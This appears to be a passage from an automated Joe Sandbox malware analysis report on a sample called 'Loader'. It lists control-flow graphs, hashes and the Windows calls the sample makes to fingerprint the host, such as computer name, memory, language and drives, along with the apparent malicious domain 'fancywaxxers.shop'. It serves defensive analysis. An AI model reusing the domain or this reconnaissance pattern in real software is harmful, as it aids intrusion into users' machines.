40b570 932->933 935 40df02-40df18 933->935
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Uninitialize
                                                                                                  • String ID: )./$VMNO$fancywaxxers.shop
                                                                                                  • API String ID: 3861434553-2937570028
                                                                                                  • Opcode ID: b39de6e2b385f4c4cd3c99358ce0fee5421ec76a58dad9fd5ae0a53480fc0133
                                                                                                  • Instruction ID: 8e4ecdc1ab7ad95a916909932472248aaffd2a19f7865df326d7c8f89b2a8b2a
                                                                                                  • Opcode Fuzzy Hash: b39de6e2b385f4c4cd3c99358ce0fee5421ec76a58dad9fd5ae0a53480fc0133
                                                                                                  • Instruction Fuzzy Hash: 63121F7164C3C08BD3319F78D89839BBFE0AB97300F184A6DD0D9AB291D7784909CB5A

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 936 4086f0-408701 call 43ce70 939 408707-40870e call 435060 936->939 940 408a5e-408a60 ExitProcess 936->940 943 408714-408738 GetCurrentProcessId GetCurrentThreadId 939->943 944 408a59 call 43d6e0 939->944 946 40873a-40873c 943->946 947 40873e-408861 SHGetSpecialFolderPathW 943->947 944->940 946->947 948 408870-4088b5 947->948 948->948 949 4088b7-4088e3 call 43bb10 948->949 952 4088f0-40892b 949->952 953 408964-40897b GetForegroundWindow 952->953 954 40892d-408962 952->954 955 408981-4089aa 953->955 956 408a23-408a3b call 409c20 953->956 954->952 957 4089b0-408a21 955->957 958 4089ac-4089ae 955->958 961 408a47-408a4e 956->961 962 408a3d call 40cad0 956->962 957->956 958->957 961->944 964 408a50-408a56 call 407fb0 961->964 965 408a42 call 40b540 962->965 964->944 965->961
                                                                                                  APIs
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00408714
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040871E
                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040883D
                                                                                                  • GetForegroundWindow.USER32 ref: 00408973
                                                                                                    • Part of subcall function 0040CAD0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CAE3
                                                                                                    • Part of subcall function 0040B540: FreeLibrary.KERNEL32(00408A47), ref: 0040B546
                                                                                                    • Part of subcall function 0040B540: FreeLibrary.KERNEL32 ref: 0040B567
                                                                                                  • ExitProcess.KERNEL32 ref: 00408A60
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 3072701918-0
                                                                                                  • Opcode ID: 6ad6a5a1739bd17e8de9aded4a8a4670945997e3b2a81193b39b4ee05969506f
                                                                                                  • Instruction ID: afa5eb8d7dea47e96b43b22583362a94540f8aab777f46d846e54ca58819dbae
                                                                                                  • Opcode Fuzzy Hash: 6ad6a5a1739bd17e8de9aded4a8a4670945997e3b2a81193b39b4ee05969506f
                                                                                                  • Instruction Fuzzy Hash: 29813872B443044FD318EEA98DC235AB7D6DBC9210F09C53EA988DB392EE789C055795

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 996 42af45-42af66 997 42af70-42afbc 996->997 997->997 998 42afbe-42afc5 997->998 999 42afc7-42afcb 998->999 1000 42afdb-42afe7 998->1000 1001 42afd0-42afd9 999->1001 1002 42b001-42b05f call 43f3e0 GetPhysicallyInstalledSystemMemory 1000->1002 1003 42afe9-42afeb 1000->1003 1001->1000 1001->1001 1008 42b060-42b08b 1002->1008 1004 42aff0-42affd 1003->1004 1004->1004 1006 42afff 1004->1006 1006->1002 1008->1008 1009 42b08d-42b0c3 call 41da40 1008->1009 1012 42b0d0-42b111 1009->1012 1012->1012 1013 42b113-42b11a 1012->1013 1014 42b12b-42b133 1013->1014 1015 42b11c 1013->1015 1016 42b135-42b136 1014->1016 1017 42b14b-42b158 1014->1017 1018 42b120-42b129 1015->1018 1019 42b140-42b149 1016->1019 1020 42b15a-42b161 1017->1020 1021 42b17b-42b1cf 1017->1021 1018->1014 1018->1018 1019->1017 1019->1019 1022 42b170-42b179 1020->1022 1023 42b1d0-42b234 1021->1023 1022->1021 1022->1022 1023->1023 1024 42b236-42b23d 1023->1024 1025 42b25b-42b268 1024->1025 1026 42b23f-42b243 1024->1026 1028 42b26a-42b271 1025->1028 1029 42b28b-42b342 1025->1029 1027 42b250-42b259 1026->1027 1027->1025 1027->1027 1030 42b280-42b289 1028->1030 1030->1029 1030->1030
                                                                                                  APIs
                                                                                                  • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042B035
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InstalledMemoryPhysicallySystem
                                                                                                  • String ID: #$E?s:
                                                                                                  • API String ID: 3960555810-1163437786
                                                                                                  • Opcode ID: 578962fcdd688bd4cb1051b610a1900332509d9fda90f2c11ab8c74f0eb12081
                                                                                                  • Instruction ID: 33cdcb939688c5f8264dd603509792a85fc77af409ff23624c08e5c85e163d59
                                                                                                  • Opcode Fuzzy Hash: 578962fcdd688bd4cb1051b610a1900332509d9fda90f2c11ab8c74f0eb12081
                                                                                                  • Instruction Fuzzy Hash: FDA1057160C3828BD339CF2594613EBBBE29FD6304F1849ADD4C987392D779450ACB96

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1031 423288-42328e 1032 423290-423295 1031->1032 1033 423297 1031->1033 1034 42329a-4232b8 call 407fa0 RtlExpandEnvironmentStrings 1032->1034 1033->1034 1037 4232e2-4232eb 1034->1037 1038 4232e0 1034->1038 1039 4232c5-4232cb call 407fb0 1034->1039 1040 4232ce-4232d5 1034->1040 1041 4232bf 1034->1041 1043 4232f4 1037->1043 1044 4232ed-4232f2 1037->1044 1038->1037 1039->1040 1040->1038 1041->1039 1045 4232fb-42332e call 407fa0 1043->1045 1044->1045 1049 423330-423344 1045->1049 1049->1049 1050 423346-42334e 1049->1050 1051 423350-423355 1050->1051 1052 423371-42337e 1050->1052 1053 423360-42336f 1051->1053 1054 423380-423384 1052->1054 1055 4233a1-4233b9 call 440980 1052->1055 1053->1052 1053->1053 1056 423390-42339f 1054->1056 1059 4233d0-4233d9 1055->1059 1060 4233c0-4233c7 1055->1060 1061 423579-423624 1055->1061 1056->1055 1056->1056 1062 4233e2 1059->1062 1063 4233db-4233e0 1059->1063 1060->1059 1064 423630-42365f 1061->1064 1065 4233e9-423492 call 407fa0 1062->1065 1063->1065 1064->1064 1066 423661-423671 call 4210d0 1064->1066 1071 4234a0-4234cc 1065->1071 1070 423676-423679 1066->1070 1071->1071 1072 4234ce-4234d7 1071->1072 1073 423501-423512 1072->1073 1074 4234d9-4234e1 1072->1074 1076 423533 1073->1076 1077 423514-42351f 1073->1077 1075 4234f0-4234ff 1074->1075 1075->1073 1075->1075 1079 423537-42355a GetLogicalDrives call 440980 1076->1079 1078 423520-42352f 1077->1078 1078->1078 1080 423531 1078->1080 1079->1038 1079->1059 1079->1060 1079->1061 1080->1079
                                                                                                  APIs
                                                                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?), ref: 004232AD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                  • String ID: :B
                                                                                                  • API String ID: 237503144-1307253848
                                                                                                  • Opcode ID: c0137d04fbf24435df4e4aee936f541541bd83fae39d8657db7b6513d76f62cd
                                                                                                  • Instruction ID: 5f009218b2ff83b98f10b98efde3965e7562e55c935e8ec6796867d4fefa97b7
                                                                                                  • Opcode Fuzzy Hash: c0137d04fbf24435df4e4aee936f541541bd83fae39d8657db7b6513d76f62cd
                                                                                                  • Instruction Fuzzy Hash: 9C9198B06083909BD310DF15D89162BBBF4FF86715F80892DF4869B251E7788A05CB9B

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1083 40cb18-40cb2f 1084 40cb30-40cb4a 1083->1084 1084->1084 1085 40cb4c-40cb77 call 401b80 1084->1085 1088 40cb80-40cba5 1085->1088 1088->1088 1089 40cba7-40cbc1 call 401b80 1088->1089 1092 40cbd0-40cbea 1089->1092 1092->1092 1093 40cbec-40cc57 call 401b80 call 438890 call 40eba0 1092->1093 1100 40cc60-40cc83 1093->1100 1100->1100 1101 40cc85-40cc97 1100->1101 1102 40ccc1-40ccda 1101->1102 1103 40cc99-40cca7 1101->1103 1105 40cce0-40ccfa 1102->1105 1104 40ccb0-40ccbf 1103->1104 1104->1102 1104->1104 1105->1105 1106 40ccfc-40cd22 call 401b80 1105->1106 1109 40cd30-40cd55 1106->1109 1109->1109 1110 40cd57-40cd78 call 401b80 1109->1110 1113 40cd80-40cd9a 1110->1113 1113->1113 1114 40cd9c-40cdae call 401b80 call 438890 1113->1114 1118 40cdb3-40ce07 call 40eba0 1114->1118 1121 40ce10-40ce34 1118->1121 1121->1121 1122 40ce36-40ce48 1121->1122 1123 40ce71-40ce89 1122->1123 1124 40ce4a-40ce58 1122->1124 1125 40ce60-40ce6f 1124->1125 1125->1123 1125->1125
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 2106D7020EE20555E1B71982A10B646A$OC$%n$%n
                                                                                                  • API String ID: 0-4232941211
                                                                                                  • Opcode ID: f6f853fba289f645c9e3fe08e2b7a48832bcfc108ca192cee4404d5ab157a308
                                                                                                  • Instruction ID: fe7b411013fb4929acb99fc6051efefedfa7f35f707d9cc08fb2ea4c93cede1d
                                                                                                  • Opcode Fuzzy Hash: f6f853fba289f645c9e3fe08e2b7a48832bcfc108ca192cee4404d5ab157a308
                                                                                                  • Instruction Fuzzy Hash: 7C715B705483848BD720AB35D8967EBBBE1DFA2724F140E7CE4C9972A2E6380505C38B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "/B$b.B
                                                                                                  • API String ID: 0-3864085942
                                                                                                  • Opcode ID: 5eaeb8bc52f5d719beb9053cc17c985c7f82ceb5173d737371e1dc4c05cda95f
                                                                                                  • Instruction ID: 5cc9f00cca0ba742df0d63fe1e3da72314f860bb9d53973b2aa4b21ad016cc4c
                                                                                                  • Opcode Fuzzy Hash: 5eaeb8bc52f5d719beb9053cc17c985c7f82ceb5173d737371e1dc4c05cda95f
                                                                                                  • Instruction Fuzzy Hash: 2A122236618601DFD714CF28EC8176AB3E2FB8A314F99853CE88597292D778EC51CB45
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: fhgn$ol
                                                                                                  • API String ID: 0-4167283932
                                                                                                  • Opcode ID: da08ea54bee912988cb471e3ce142a96c699558faf509614c6992423802c14a8
                                                                                                  • Instruction ID: 2da961be2137b360597093f61ce72c1df56bdd82e7c04e150d3b5f9b09e48764
                                                                                                  • Opcode Fuzzy Hash: da08ea54bee912988cb471e3ce142a96c699558faf509614c6992423802c14a8
                                                                                                  • Instruction Fuzzy Hash: FCC1047278C3504BD328CF6494517AFBBE29BC2314F18893DA8E56B7C1C6398906879B
                                                                                                  APIs
                                                                                                  • LdrInitializeThunk.NTDLL(0044095A,00000002,00000018,?,?,00000018,?,?,?), ref: 0043D78E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: @
                                                                                                  • API String ID: 2994545307-2766056989
                                                                                                  • Opcode ID: b1b1ead5dae6f6a33989fe5dd4263f9eb24f2b177f329d8dd0c8e41ada1c6e0a
                                                                                                  • Instruction ID: cd04657e04046196753a58a3054c48e6cc5f0be8d5f74c217d39f3148e351ce6
                                                                                                  • Opcode Fuzzy Hash: b1b1ead5dae6f6a33989fe5dd4263f9eb24f2b177f329d8dd0c8e41ada1c6e0a
                                                                                                  • Instruction Fuzzy Hash: 6F3127B09083008FE710CF24D88166B77F0FFA5328F14862DE9D96B392E7399914C78A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: @
                                                                                                  • API String ID: 2994545307-2766056989
                                                                                                  • Opcode ID: e3174f3e4897d3c7b1146eeca913d150adf74d2e9064db061223cc2c55c99011
                                                                                                  • Instruction ID: ba68d8ee311571a43eaf5a64773383bbcb5ef2f33ac6797cb60086981b0f1a52
                                                                                                  • Opcode Fuzzy Hash: e3174f3e4897d3c7b1146eeca913d150adf74d2e9064db061223cc2c55c99011
                                                                                                  • Instruction Fuzzy Hash: A22107715083049FC310DF18D88166FBBF4EF8A324F11A93DE99987390D335A849CB66
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 11736493a0cd5d135215e7205036eabcb854b8990f1f56deb24d05a096794151
                                                                                                  • Instruction ID: 9cc52c4ec857cc6ea445f800376bfde6ca948edeb5e5baa5aa85d7adc9fcd5e6
                                                                                                  • Opcode Fuzzy Hash: 11736493a0cd5d135215e7205036eabcb854b8990f1f56deb24d05a096794151
                                                                                                  • Instruction Fuzzy Hash: 0151F3B6A05211DBDB148F24DC026AB73A1FF92364F08457EF895873A1FB389850C79A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: ab2ef5289ddfd6eccbde56c1b1fbb0a9e9bad83a21f7d50b0a20125d70595fab
                                                                                                  • Instruction ID: f5534deee1170641e9b75844b4dec6bdcbb7d2d209fd57b2ee0b4f7e39a646d5
                                                                                                  • Opcode Fuzzy Hash: ab2ef5289ddfd6eccbde56c1b1fbb0a9e9bad83a21f7d50b0a20125d70595fab
                                                                                                  • Instruction Fuzzy Hash: B9310334704300EFF7188B249CC1B7BB7A5EB86714F244A2EE685A7291D279EC61DB49
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d8c1ed601db62ed508973da6306fcc5acf4b8a22abf5a858ea5547065e9d5d06
                                                                                                  • Instruction ID: b3a95e2bb5f8960a1235e077c6b7e72413ed9851bd64d258442188107c148762
                                                                                                  • Opcode Fuzzy Hash: d8c1ed601db62ed508973da6306fcc5acf4b8a22abf5a858ea5547065e9d5d06
                                                                                                  • Instruction Fuzzy Hash: 9B21F876B516118BDB18CF69DCC23AABBB3EBC5214B1DC179CC15EB346C638D8018B94

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1126 437b21-437b54 GetUserDefaultUILanguage 1127 437b56-437b59 1126->1127 1128 437bb3-437be1 1127->1128 1129 437b5b-437bb1 1127->1129 1129->1127
                                                                                                  APIs
                                                                                                  • GetUserDefaultUILanguage.KERNELBASE ref: 00437B27
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DefaultLanguageUser
                                                                                                  • String ID: afg
                                                                                                  • API String ID: 95929093-2051710476
                                                                                                  • Opcode ID: 99f550e9b730278fa53bb6c7b122b0af9a2a3d57c1cc3f139686120452f067d3
                                                                                                  • Instruction ID: 22a80c481e19e3b2540f94b6635c5ce98c759e98e9f29163fd3db38968db8088
                                                                                                  • Opcode Fuzzy Hash: 99f550e9b730278fa53bb6c7b122b0af9a2a3d57c1cc3f139686120452f067d3
                                                                                                  • Instruction Fuzzy Hash: EC11E731F452988FDB2CCA39CD957D9BAA35B8A304F18C1EDC95997384C97D0E418F91
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0042CCEC
                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,B45BAF4B,00000100), ref: 0042CDF5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ComputerFreeLibraryName
                                                                                                  • String ID:
                                                                                                  • API String ID: 2904949787-0
                                                                                                  • Opcode ID: df380d9b565bcc67a85d9a01749c8897f66fc2e9cfd8a8014eb5d39749be448f
                                                                                                  • Instruction ID: d641341d84eae905b5142834d65e971b33c12d68b6e5867478b787074c5fccae
                                                                                                  • Opcode Fuzzy Hash: df380d9b565bcc67a85d9a01749c8897f66fc2e9cfd8a8014eb5d39749be448f
                                                                                                  • Instruction Fuzzy Hash: 4C3148766087908BD7288F25DC917EBBBD2AFD7314F1885AED4C9C7341DA389805CB92
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0042CCEC
                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,B45BAF4B,00000100), ref: 0042CDF5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ComputerFreeLibraryName
                                                                                                  • String ID:
                                                                                                  • API String ID: 2904949787-0
                                                                                                  • Opcode ID: 23c82450fcce5d1a71674f202e2a6edcaa72f5494021d8026c7bee4bfa806c07
                                                                                                  • Instruction ID: 7e58c054ad4c1885c2c1cb6d78eb26428200cfe806fb6769148a7d1df1048434
                                                                                                  • Opcode Fuzzy Hash: 23c82450fcce5d1a71674f202e2a6edcaa72f5494021d8026c7bee4bfa806c07
                                                                                                  • Instruction Fuzzy Hash: 5B317676A186508BD7288F24DC817EBBB93AFD6314F09857ED4C9C3380DE7848058B92
                                                                                                  APIs
                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040EA9A
                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040EAB2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeSecurity
                                                                                                  • String ID:
                                                                                                  • API String ID: 640775948-0
                                                                                                  • Opcode ID: f65eda782c36dffe7ef9def4aab4bdad587092fcf1408e5ac4ac40d5a878dae3
                                                                                                  • Instruction ID: aef75d68a4490c277d8120882d0bd981708d3d0005b24a40b52fe1aead24dd11
                                                                                                  • Opcode Fuzzy Hash: f65eda782c36dffe7ef9def4aab4bdad587092fcf1408e5ac4ac40d5a878dae3
                                                                                                  • Instruction Fuzzy Hash: E0F0BF397C8720B7F6784714DE57F4425109B85F21F754315BB653E6D486D83500454D
                                                                                                  APIs
                                                                                                  • GetForegroundWindow.USER32 ref: 0043E5F1
                                                                                                  • GetForegroundWindow.USER32 ref: 0043E602
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ForegroundWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2020703349-0
                                                                                                  • Opcode ID: 40ea6d50e8063d59041621704432c46dc7637167314ba4878e995fb574891d7e
                                                                                                  • Instruction ID: 795eeaea55814494165e30d00b0d5d5cb67b71bd4405ab01a49c1510c69d8a3e
                                                                                                  • Opcode Fuzzy Hash: 40ea6d50e8063d59041621704432c46dc7637167314ba4878e995fb574891d7e
                                                                                                  • Instruction Fuzzy Hash: 09D0A7FCE011026BC7049B61FD0A51A3715AB4B24A705043DF80283733DDB5D4198A4F
                                                                                                  APIs
                                                                                                  • GetComputerNameExA.KERNELBASE(00000006,B45BAF4B,00000100), ref: 0042CDF5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ComputerName
                                                                                                  • String ID:
                                                                                                  • API String ID: 3545744682-0
                                                                                                  • Opcode ID: 273410e1a0986b7bf9542a51944ecf9ef7cde3a70292866e7efeef18f4098a7c
                                                                                                  • Instruction ID: 6a2164c78a882dbf3bbc253b3ae6138675630f9298fe9e2ab660f1a8c9bf1590
                                                                                                  • Opcode Fuzzy Hash: 273410e1a0986b7bf9542a51944ecf9ef7cde3a70292866e7efeef18f4098a7c
                                                                                                  • Instruction Fuzzy Hash: 60315676A082508BD7288F24DC413EBBB93AFD6314F19857ED8C8D3384DE7898018B92
                                                                                                  APIs
                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042CEDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ComputerName
                                                                                                  • String ID:
                                                                                                  • API String ID: 3545744682-0
                                                                                                  • Opcode ID: e067db99e108360550f9a954763bfbccccf5fecd1fe6a1b53a013546bc7660b5
                                                                                                  • Instruction ID: 9d34d05e6e5ee2dfc0af6d52719f597b987552556ff8c48c27376badfaa12faa
                                                                                                  • Opcode Fuzzy Hash: e067db99e108360550f9a954763bfbccccf5fecd1fe6a1b53a013546bc7660b5
                                                                                                  • Instruction Fuzzy Hash: CD11936020C3D18ADB358B3898987FBBBD5AF97320F584A6EC4D8C7282DB384446C756
                                                                                                  APIs
                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042CEDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ComputerName
                                                                                                  • String ID:
                                                                                                  • API String ID: 3545744682-0
